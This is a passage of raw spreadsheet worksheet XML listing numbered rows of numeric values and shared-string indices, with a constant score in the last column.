        <v>4.7407492E7</v>
      </c>
      <c r="C21843" s="2" t="s">
        <v>21090</v>
      </c>
      <c r="D21843" s="2">
        <v>1.0</v>
      </c>
      <c r="E21843" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21843" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21844" ht="15.75" customHeight="1">
      <c r="A21844" s="1">
        <v>6017.0</v>
      </c>
      <c r="B21844" s="2">
        <v>4.7477446E7</v>
      </c>
      <c r="C21844" s="2" t="s">
        <v>21091</v>
      </c>
      <c r="D21844" s="2">
        <v>1.0</v>
      </c>
      <c r="E21844" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21844" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21845" ht="15.75" customHeight="1">
      <c r="A21845" s="1">
        <v>6262.0</v>
      </c>
      <c r="B21845" s="2">
        <v>4.8118409E7</v>
      </c>
      <c r="C21845" s="2" t="s">
        <v>21092</v>
      </c>
      <c r="D21845" s="2">
        <v>1.0</v>
      </c>
      <c r="E21845" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21845" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21846" ht="15.75" customHeight="1">
      <c r="A21846" s="1">
        <v>6334.0</v>
      </c>
      <c r="B21846" s="2">
        <v>4.829637E7</v>
      </c>
      <c r="C21846" s="2" t="s">
        <v>21093</v>
      </c>
      <c r="D21846" s="2">
        <v>1.0</v>
      </c>
      <c r="E21846" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21846" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21847" ht="15.75" customHeight="1">
      <c r="A21847" s="1">
        <v>6499.0</v>
      </c>
      <c r="B21847" s="2">
        <v>4.8707779E7</v>
      </c>
      <c r="C21847" s="2" t="s">
        <v>21094</v>
      </c>
      <c r="D21847" s="2">
        <v>1.0</v>
      </c>
      <c r="E21847" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21847" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21848" ht="15.75" customHeight="1">
      <c r="A21848" s="1">
        <v>6521.0</v>
      </c>
      <c r="B21848" s="2">
        <v>4.8801535E7</v>
      </c>
      <c r="C21848" s="2" t="s">
        <v>21095</v>
      </c>
      <c r="D21848" s="2">
        <v>1.0</v>
      </c>
      <c r="E21848" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21848" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21849" ht="15.75" customHeight="1">
      <c r="A21849" s="1">
        <v>6542.0</v>
      </c>
      <c r="B21849" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C21849" s="2" t="s">
        <v>21096</v>
      </c>
      <c r="D21849" s="2">
        <v>1.0</v>
      </c>
      <c r="E21849" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21849" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21850" ht="15.75" customHeight="1">
      <c r="A21850" s="1">
        <v>6632.0</v>
      </c>
      <c r="B21850" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C21850" s="2" t="s">
        <v>21097</v>
      </c>
      <c r="D21850" s="2">
        <v>1.0</v>
      </c>
      <c r="E21850" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21850" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21851" ht="15.75" customHeight="1">
      <c r="A21851" s="1">
        <v>6735.0</v>
      </c>
      <c r="B21851" s="2">
        <v>4.934675E7</v>
      </c>
      <c r="C21851" s="2" t="s">
        <v>21098</v>
      </c>
      <c r="D21851" s="2">
        <v>1.0</v>
      </c>
      <c r="E21851" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21851" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21852" ht="15.75" customHeight="1">
      <c r="A21852" s="1">
        <v>7054.0</v>
      </c>
      <c r="B21852" s="2">
        <v>5.0188777E7</v>
      </c>
      <c r="C21852" s="2" t="s">
        <v>21099</v>
      </c>
      <c r="D21852" s="2">
        <v>1.0</v>
      </c>
      <c r="E21852" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21852" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21853" ht="15.75" customHeight="1">
      <c r="A21853" s="1">
        <v>7073.0</v>
      </c>
      <c r="B21853" s="2">
        <v>5.0248684E7</v>
      </c>
      <c r="C21853" s="2" t="s">
        <v>21100</v>
      </c>
      <c r="D21853" s="2">
        <v>1.0</v>
      </c>
      <c r="E21853" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21853" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21854" ht="15.75" customHeight="1">
      <c r="A21854" s="1">
        <v>7111.0</v>
      </c>
      <c r="B21854" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C21854" s="2" t="s">
        <v>21101</v>
      </c>
      <c r="D21854" s="2">
        <v>1.0</v>
      </c>
      <c r="E21854" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21854" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21855" ht="15.75" customHeight="1">
      <c r="A21855" s="1">
        <v>7846.0</v>
      </c>
      <c r="B21855" s="2">
        <v>5.2334225E7</v>
      </c>
      <c r="C21855" s="2" t="s">
        <v>21102</v>
      </c>
      <c r="D21855" s="2">
        <v>1.0</v>
      </c>
      <c r="E21855" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21855" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21856" ht="15.75" customHeight="1">
      <c r="A21856" s="1">
        <v>7973.0</v>
      </c>
      <c r="B21856" s="2">
        <v>5.2701453E7</v>
      </c>
      <c r="C21856" s="2" t="s">
        <v>21103</v>
      </c>
      <c r="D21856" s="2">
        <v>1.0</v>
      </c>
      <c r="E21856" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21856" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21857" ht="15.75" customHeight="1">
      <c r="A21857" s="1">
        <v>8051.0</v>
      </c>
      <c r="B21857" s="2">
        <v>5.2874021E7</v>
      </c>
      <c r="C21857" s="2" t="s">
        <v>21104</v>
      </c>
      <c r="D21857" s="2">
        <v>1.0</v>
      </c>
      <c r="E21857" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21857" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21858" ht="15.75" customHeight="1">
      <c r="A21858" s="1">
        <v>8094.0</v>
      </c>
      <c r="B21858" s="2">
        <v>5.3049939E7</v>
      </c>
      <c r="C21858" s="2" t="s">
        <v>21105</v>
      </c>
      <c r="D21858" s="2">
        <v>1.0</v>
      </c>
      <c r="E21858" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21858" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21859" ht="15.75" customHeight="1">
      <c r="A21859" s="1">
        <v>8275.0</v>
      </c>
      <c r="B21859" s="2">
        <v>5.3462065E7</v>
      </c>
      <c r="C21859" s="2" t="s">
        <v>21106</v>
      </c>
      <c r="D21859" s="2">
        <v>1.0</v>
      </c>
      <c r="E21859" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21859" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21860" ht="15.75" customHeight="1">
      <c r="A21860" s="1">
        <v>8351.0</v>
      </c>
      <c r="B21860" s="2">
        <v>5.3744869E7</v>
      </c>
      <c r="C21860" s="2" t="s">
        <v>21107</v>
      </c>
      <c r="D21860" s="2">
        <v>1.0</v>
      </c>
      <c r="E21860" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21860" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21861" ht="15.75" customHeight="1">
      <c r="A21861" s="1">
        <v>8754.0</v>
      </c>
      <c r="B21861" s="2">
        <v>5.4566282E7</v>
      </c>
      <c r="C21861" s="2" t="s">
        <v>21108</v>
      </c>
      <c r="D21861" s="2">
        <v>1.0</v>
      </c>
      <c r="E21861" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21861" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21862" ht="15.75" customHeight="1">
      <c r="A21862" s="1">
        <v>8916.0</v>
      </c>
      <c r="B21862" s="2">
        <v>5.4814995E7</v>
      </c>
      <c r="C21862" s="2" t="s">
        <v>21109</v>
      </c>
      <c r="D21862" s="2">
        <v>1.0</v>
      </c>
      <c r="E21862" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21862" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21863" ht="15.75" customHeight="1">
      <c r="A21863" s="1">
        <v>8989.0</v>
      </c>
      <c r="B21863" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C21863" s="2" t="s">
        <v>21110</v>
      </c>
      <c r="D21863" s="2">
        <v>1.0</v>
      </c>
      <c r="E21863" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21863" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21864" ht="15.75" customHeight="1">
      <c r="A21864" s="1">
        <v>9204.0</v>
      </c>
      <c r="B21864" s="2">
        <v>5.5405184E7</v>
      </c>
      <c r="C21864" s="2" t="s">
        <v>21111</v>
      </c>
      <c r="D21864" s="2">
        <v>1.0</v>
      </c>
      <c r="E21864" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21864" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21865" ht="15.75" customHeight="1">
      <c r="A21865" s="1">
        <v>9248.0</v>
      </c>
      <c r="B21865" s="2">
        <v>5.5473488E7</v>
      </c>
      <c r="C21865" s="2" t="s">
        <v>21112</v>
      </c>
      <c r="D21865" s="2">
        <v>1.0</v>
      </c>
      <c r="E21865" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21865" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21866" ht="15.75" customHeight="1">
      <c r="A21866" s="1">
        <v>9457.0</v>
      </c>
      <c r="B21866" s="2">
        <v>5.5847788E7</v>
      </c>
      <c r="C21866" s="2" t="s">
        <v>21113</v>
      </c>
      <c r="D21866" s="2">
        <v>1.0</v>
      </c>
      <c r="E21866" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21866" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21867" ht="15.75" customHeight="1">
      <c r="A21867" s="1">
        <v>9670.0</v>
      </c>
      <c r="B21867" s="2">
        <v>5.6324073E7</v>
      </c>
      <c r="C21867" s="2" t="s">
        <v>21114</v>
      </c>
      <c r="D21867" s="2">
        <v>1.0</v>
      </c>
      <c r="E21867" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21867" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21868" ht="15.75" customHeight="1">
      <c r="A21868" s="1">
        <v>9722.0</v>
      </c>
      <c r="B21868" s="2">
        <v>5.642916E7</v>
      </c>
      <c r="C21868" s="2" t="s">
        <v>21115</v>
      </c>
      <c r="D21868" s="2">
        <v>1.0</v>
      </c>
      <c r="E21868" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21868" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21869" ht="15.75" customHeight="1">
      <c r="A21869" s="1">
        <v>9841.0</v>
      </c>
      <c r="B21869" s="2">
        <v>5.6665649E7</v>
      </c>
      <c r="C21869" s="2" t="s">
        <v>21116</v>
      </c>
      <c r="D21869" s="2">
        <v>1.0</v>
      </c>
      <c r="E21869" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21869" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21870" ht="15.75" customHeight="1">
      <c r="A21870" s="1">
        <v>10314.0</v>
      </c>
      <c r="B21870" s="2">
        <v>5.7691018E7</v>
      </c>
      <c r="C21870" s="2" t="s">
        <v>21117</v>
      </c>
      <c r="D21870" s="2">
        <v>1.0</v>
      </c>
      <c r="E21870" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21870" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21871" ht="15.75" customHeight="1">
      <c r="A21871" s="1">
        <v>10411.0</v>
      </c>
      <c r="B21871" s="2">
        <v>9844820.0</v>
      </c>
      <c r="C21871" s="2" t="s">
        <v>21118</v>
      </c>
      <c r="D21871" s="2">
        <v>1.0</v>
      </c>
      <c r="E21871" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21871" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21872" ht="15.75" customHeight="1">
      <c r="A21872" s="1">
        <v>10600.0</v>
      </c>
      <c r="B21872" s="2">
        <v>1.3599572E7</v>
      </c>
      <c r="C21872" s="2" t="s">
        <v>21119</v>
      </c>
      <c r="D21872" s="2">
        <v>1.0</v>
      </c>
      <c r="E21872" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21872" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21873" ht="15.75" customHeight="1">
      <c r="A21873" s="1">
        <v>10961.0</v>
      </c>
      <c r="B21873" s="2">
        <v>1.7186614E7</v>
      </c>
      <c r="C21873" s="2" t="s">
        <v>21120</v>
      </c>
      <c r="D21873" s="2">
        <v>1.0</v>
      </c>
      <c r="E21873" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21873" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21874" ht="15.75" customHeight="1">
      <c r="A21874" s="1">
        <v>11129.0</v>
      </c>
      <c r="B21874" s="2">
        <v>1.9101435E7</v>
      </c>
      <c r="C21874" s="2" t="s">
        <v>21121</v>
      </c>
      <c r="D21874" s="2">
        <v>1.0</v>
      </c>
      <c r="E21874" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21874" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21875" ht="15.75" customHeight="1">
      <c r="A21875" s="1">
        <v>11170.0</v>
      </c>
      <c r="B21875" s="2">
        <v>1.9645866E7</v>
      </c>
      <c r="C21875" s="2" t="s">
        <v>21122</v>
      </c>
      <c r="D21875" s="2">
        <v>1.0</v>
      </c>
      <c r="E21875" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21875" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21876" ht="15.75" customHeight="1">
      <c r="A21876" s="1">
        <v>11264.0</v>
      </c>
      <c r="B21876" s="2">
        <v>2.0678497E7</v>
      </c>
      <c r="C21876" s="2" t="s">
        <v>21123</v>
      </c>
      <c r="D21876" s="2">
        <v>1.0</v>
      </c>
      <c r="E21876" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21876" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21877" ht="15.75" customHeight="1">
      <c r="A21877" s="1">
        <v>11399.0</v>
      </c>
      <c r="B21877" s="2">
        <v>2.159419E7</v>
      </c>
      <c r="C21877" s="2" t="s">
        <v>21124</v>
      </c>
      <c r="D21877" s="2">
        <v>1.0</v>
      </c>
      <c r="E21877" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21877" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21878" ht="15.75" customHeight="1">
      <c r="A21878" s="1">
        <v>11432.0</v>
      </c>
      <c r="B21878" s="2">
        <v>2.1748195E7</v>
      </c>
      <c r="C21878" s="2" t="s">
        <v>21125</v>
      </c>
      <c r="D21878" s="2">
        <v>1.0</v>
      </c>
      <c r="E21878" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21878" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21879" ht="15.75" customHeight="1">
      <c r="A21879" s="1">
        <v>11466.0</v>
      </c>
      <c r="B21879" s="2">
        <v>2.1953931E7</v>
      </c>
      <c r="C21879" s="2" t="s">
        <v>21126</v>
      </c>
      <c r="D21879" s="2">
        <v>1.0</v>
      </c>
      <c r="E21879" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21879" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21880" ht="15.75" customHeight="1">
      <c r="A21880" s="1">
        <v>11776.0</v>
      </c>
      <c r="B21880" s="2">
        <v>2.4273797E7</v>
      </c>
      <c r="C21880" s="2" t="s">
        <v>21127</v>
      </c>
      <c r="D21880" s="2">
        <v>1.0</v>
      </c>
      <c r="E21880" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21880" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21881" ht="15.75" customHeight="1">
      <c r="A21881" s="1">
        <v>11851.0</v>
      </c>
      <c r="B21881" s="2">
        <v>2.4748133E7</v>
      </c>
      <c r="C21881" s="2" t="s">
        <v>21128</v>
      </c>
      <c r="D21881" s="2">
        <v>1.0</v>
      </c>
      <c r="E21881" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21881" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21882" ht="15.75" customHeight="1">
      <c r="A21882" s="1">
        <v>11869.0</v>
      </c>
      <c r="B21882" s="2">
        <v>2.4910611E7</v>
      </c>
      <c r="C21882" s="2" t="s">
        <v>21129</v>
      </c>
      <c r="D21882" s="2">
        <v>1.0</v>
      </c>
      <c r="E21882" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21882" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21883" ht="15.75" customHeight="1">
      <c r="A21883" s="1">
        <v>12010.0</v>
      </c>
      <c r="B21883" s="2">
        <v>2.6040948E7</v>
      </c>
      <c r="C21883" s="2" t="s">
        <v>21130</v>
      </c>
      <c r="D21883" s="2">
        <v>1.0</v>
      </c>
      <c r="E21883" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21883" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21884" ht="15.75" customHeight="1">
      <c r="A21884" s="1">
        <v>12142.0</v>
      </c>
      <c r="B21884" s="2">
        <v>2.7088393E7</v>
      </c>
      <c r="C21884" s="2" t="s">
        <v>21131</v>
      </c>
      <c r="D21884" s="2">
        <v>1.0</v>
      </c>
      <c r="E21884" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21884" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21885" ht="15.75" customHeight="1">
      <c r="A21885" s="1">
        <v>12252.0</v>
      </c>
      <c r="B21885" s="2">
        <v>2.7950922E7</v>
      </c>
      <c r="C21885" s="2" t="s">
        <v>21132</v>
      </c>
      <c r="D21885" s="2">
        <v>1.0</v>
      </c>
      <c r="E21885" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21885" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21886" ht="15.75" customHeight="1">
      <c r="A21886" s="1">
        <v>12399.0</v>
      </c>
      <c r="B21886" s="2">
        <v>2.8933763E7</v>
      </c>
      <c r="C21886" s="2" t="s">
        <v>21133</v>
      </c>
      <c r="D21886" s="2">
        <v>1.0</v>
      </c>
      <c r="E21886" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21886" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21887" ht="15.75" customHeight="1">
      <c r="A21887" s="1">
        <v>12497.0</v>
      </c>
      <c r="B21887" s="2">
        <v>2.9594294E7</v>
      </c>
      <c r="C21887" s="2" t="s">
        <v>21134</v>
      </c>
      <c r="D21887" s="2">
        <v>1.0</v>
      </c>
      <c r="E21887" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21887" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21888" ht="15.75" customHeight="1">
      <c r="A21888" s="1">
        <v>12628.0</v>
      </c>
      <c r="B21888" s="2">
        <v>3.0238064E7</v>
      </c>
      <c r="C21888" s="2" t="s">
        <v>21135</v>
      </c>
      <c r="D21888" s="2">
        <v>1.0</v>
      </c>
      <c r="E21888" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21888" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21889" ht="15.75" customHeight="1">
      <c r="A21889" s="1">
        <v>12763.0</v>
      </c>
      <c r="B21889" s="2">
        <v>3.1179656E7</v>
      </c>
      <c r="C21889" s="2" t="s">
        <v>21136</v>
      </c>
      <c r="D21889" s="2">
        <v>1.0</v>
      </c>
      <c r="E21889" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21889" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21890" ht="15.75" customHeight="1">
      <c r="A21890" s="1">
        <v>13028.0</v>
      </c>
      <c r="B21890" s="2">
        <v>3.2948392E7</v>
      </c>
      <c r="C21890" s="2" t="s">
        <v>21137</v>
      </c>
      <c r="D21890" s="2">
        <v>1.0</v>
      </c>
      <c r="E21890" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21890" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21891" ht="15.75" customHeight="1">
      <c r="A21891" s="1">
        <v>13244.0</v>
      </c>
      <c r="B21891" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C21891" s="2" t="s">
        <v>21138</v>
      </c>
      <c r="D21891" s="2">
        <v>1.0</v>
      </c>
      <c r="E21891" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21891" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21892" ht="15.75" customHeight="1">
      <c r="A21892" s="1">
        <v>13428.0</v>
      </c>
      <c r="B21892" s="2">
        <v>3.5087605E7</v>
      </c>
      <c r="C21892" s="2" t="s">
        <v>21139</v>
      </c>
      <c r="D21892" s="2">
        <v>1.0</v>
      </c>
      <c r="E21892" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21892" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21893" ht="15.75" customHeight="1">
      <c r="A21893" s="1">
        <v>13625.0</v>
      </c>
      <c r="B21893" s="2">
        <v>3.5880533E7</v>
      </c>
      <c r="C21893" s="2" t="s">
        <v>21140</v>
      </c>
      <c r="D21893" s="2">
        <v>1.0</v>
      </c>
      <c r="E21893" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21893" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21894" ht="15.75" customHeight="1">
      <c r="A21894" s="1">
        <v>13647.0</v>
      </c>
      <c r="B21894" s="2">
        <v>3.593166E7</v>
      </c>
      <c r="C21894" s="2" t="s">
        <v>21141</v>
      </c>
      <c r="D21894" s="2">
        <v>1.0</v>
      </c>
      <c r="E21894" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21894" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21895" ht="15.75" customHeight="1">
      <c r="A21895" s="1">
        <v>13717.0</v>
      </c>
      <c r="B21895" s="2">
        <v>3.6317859E7</v>
      </c>
      <c r="C21895" s="2" t="s">
        <v>21142</v>
      </c>
      <c r="D21895" s="2">
        <v>1.0</v>
      </c>
      <c r="E21895" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21895" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21896" ht="15.75" customHeight="1">
      <c r="A21896" s="1">
        <v>14293.0</v>
      </c>
      <c r="B21896" s="2">
        <v>3.8509235E7</v>
      </c>
      <c r="C21896" s="2" t="s">
        <v>21143</v>
      </c>
      <c r="D21896" s="2">
        <v>1.0</v>
      </c>
      <c r="E21896" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21896" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21897" ht="15.75" customHeight="1">
      <c r="A21897" s="1">
        <v>14408.0</v>
      </c>
      <c r="B21897" s="2">
        <v>3.9192932E7</v>
      </c>
      <c r="C21897" s="2" t="s">
        <v>21144</v>
      </c>
      <c r="D21897" s="2">
        <v>1.0</v>
      </c>
      <c r="E21897" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21897" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21898" ht="15.75" customHeight="1">
      <c r="A21898" s="1">
        <v>14443.0</v>
      </c>
      <c r="B21898" s="2">
        <v>3.934214E7</v>
      </c>
      <c r="C21898" s="2" t="s">
        <v>21145</v>
      </c>
      <c r="D21898" s="2">
        <v>1.0</v>
      </c>
      <c r="E21898" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21898" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21899" ht="15.75" customHeight="1">
      <c r="A21899" s="1">
        <v>14945.0</v>
      </c>
      <c r="B21899" s="2">
        <v>4.1271824E7</v>
      </c>
      <c r="C21899" s="2" t="s">
        <v>21146</v>
      </c>
      <c r="D21899" s="2">
        <v>1.0</v>
      </c>
      <c r="E21899" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21899" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21900" ht="15.75" customHeight="1">
      <c r="A21900" s="1">
        <v>14970.0</v>
      </c>
      <c r="B21900" s="2">
        <v>4.1356416E7</v>
      </c>
      <c r="C21900" s="2" t="s">
        <v>21147</v>
      </c>
      <c r="D21900" s="2">
        <v>1.0</v>
      </c>
      <c r="E21900" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21900" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21901" ht="15.75" customHeight="1">
      <c r="A21901" s="1">
        <v>15014.0</v>
      </c>
      <c r="B21901" s="2">
        <v>4.1504749E7</v>
      </c>
      <c r="C21901" s="2" t="s">
        <v>21148</v>
      </c>
      <c r="D21901" s="2">
        <v>1.0</v>
      </c>
      <c r="E21901" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21901" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21902" ht="15.75" customHeight="1">
      <c r="A21902" s="1">
        <v>15090.0</v>
      </c>
      <c r="B21902" s="2">
        <v>4.1781259E7</v>
      </c>
      <c r="C21902" s="2" t="s">
        <v>21149</v>
      </c>
      <c r="D21902" s="2">
        <v>1.0</v>
      </c>
      <c r="E21902" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21902" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21903" ht="15.75" customHeight="1">
      <c r="A21903" s="1">
        <v>15249.0</v>
      </c>
      <c r="B21903" s="2">
        <v>4.2284318E7</v>
      </c>
      <c r="C21903" s="2" t="s">
        <v>21150</v>
      </c>
      <c r="D21903" s="2">
        <v>1.0</v>
      </c>
      <c r="E21903" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21903" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21904" ht="15.75" customHeight="1">
      <c r="A21904" s="1">
        <v>15503.0</v>
      </c>
      <c r="B21904" s="2">
        <v>4.3216474E7</v>
      </c>
      <c r="C21904" s="2" t="s">
        <v>21151</v>
      </c>
      <c r="D21904" s="2">
        <v>1.0</v>
      </c>
      <c r="E21904" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21904" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21905" ht="15.75" customHeight="1">
      <c r="A21905" s="1">
        <v>15578.0</v>
      </c>
      <c r="B21905" s="2">
        <v>4.3439333E7</v>
      </c>
      <c r="C21905" s="2" t="s">
        <v>21152</v>
      </c>
      <c r="D21905" s="2">
        <v>1.0</v>
      </c>
      <c r="E21905" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21905" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21906" ht="15.75" customHeight="1">
      <c r="A21906" s="1">
        <v>15685.0</v>
      </c>
      <c r="B21906" s="2">
        <v>4.3849718E7</v>
      </c>
      <c r="C21906" s="2" t="s">
        <v>21153</v>
      </c>
      <c r="D21906" s="2">
        <v>1.0</v>
      </c>
      <c r="E21906" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21906" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21907" ht="15.75" customHeight="1">
      <c r="A21907" s="1">
        <v>15879.0</v>
      </c>
      <c r="B21907" s="2">
        <v>4.4513766E7</v>
      </c>
      <c r="C21907" s="2" t="s">
        <v>21154</v>
      </c>
      <c r="D21907" s="2">
        <v>1.0</v>
      </c>
      <c r="E21907" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21907" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21908" ht="15.75" customHeight="1">
      <c r="A21908" s="1">
        <v>16132.0</v>
      </c>
      <c r="B21908" s="2">
        <v>4.5514747E7</v>
      </c>
      <c r="C21908" s="2" t="s">
        <v>21155</v>
      </c>
      <c r="D21908" s="2">
        <v>1.0</v>
      </c>
      <c r="E21908" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21908" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21909" ht="15.75" customHeight="1">
      <c r="A21909" s="1">
        <v>16139.0</v>
      </c>
      <c r="B21909" s="2">
        <v>4.5546328E7</v>
      </c>
      <c r="C21909" s="2" t="s">
        <v>21156</v>
      </c>
      <c r="D21909" s="2">
        <v>1.0</v>
      </c>
      <c r="E21909" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21909" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21910" ht="15.75" customHeight="1">
      <c r="A21910" s="1">
        <v>16169.0</v>
      </c>
      <c r="B21910" s="2">
